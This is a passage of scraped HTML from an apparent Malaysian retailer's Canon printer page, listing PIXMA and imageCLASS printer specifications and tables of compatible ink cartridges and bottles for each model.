srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL 